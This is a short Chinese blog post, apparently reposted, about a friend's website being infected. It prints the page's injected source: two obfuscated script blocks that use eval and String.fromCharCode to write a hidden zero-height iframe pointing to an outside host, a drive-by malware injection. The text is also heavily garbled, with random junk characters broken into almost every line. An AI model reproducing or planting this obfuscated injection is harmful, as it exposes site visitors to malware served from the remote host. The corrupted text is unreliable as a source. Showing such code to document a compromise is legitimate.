首发在我的博客里面,
#HDP ha 5[y+X|Am http://www.areway.cn/?p=175 ^ 0.` 1$ :\Q#W4~p 6e>P!bo 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
!aB~G}' i@`qam
<script>t=’60,105,102,114,97,109,101,
vw6>eT 32,115,114,99,61,104,116,116,112,58,47,47,
yUjkRT&h 102,114,101,101,46,117,45,117,117,117,46,99,
Q7#t#XM 110,47,101,114,114,111,114,46,104,116,109,
~ <36vsk 32,119,105,100,116,104,61,49,48,48,32,104,
od)ssL&E~ 101,105,103,104,116,61,48,62,60,47,105,102,
dv Vz# 114,97,109,101,62′;
mclV"? t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
s:K'I7_#@ F%f)oq`B <script>t=’60,105,102,114,97,109,101,32,115,
%Yt;)q3U 114,99,61,104,116,116,112,58,47,47,102,114,
p\P) 101,101,46,117,45,117,117,117,46,99,110,47,
<A(Bq'eQM 101,114,114,111,114,46,104,116,109,32,119,
WjBH2 v 105,100,116,104,61,49,48,48,32,104,101,105,
-TMg9M4 103,104,116,61,48,62,60,47,105,102,114,97,
-^Qm_lN 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
"l{{H&d document.write(t);</script>
%'uei4 m3~_uc/+D <html xmlns=”
4T]A!
y{
http://www.w3.org/1999/xhtml 6e S~* “>
uPy5<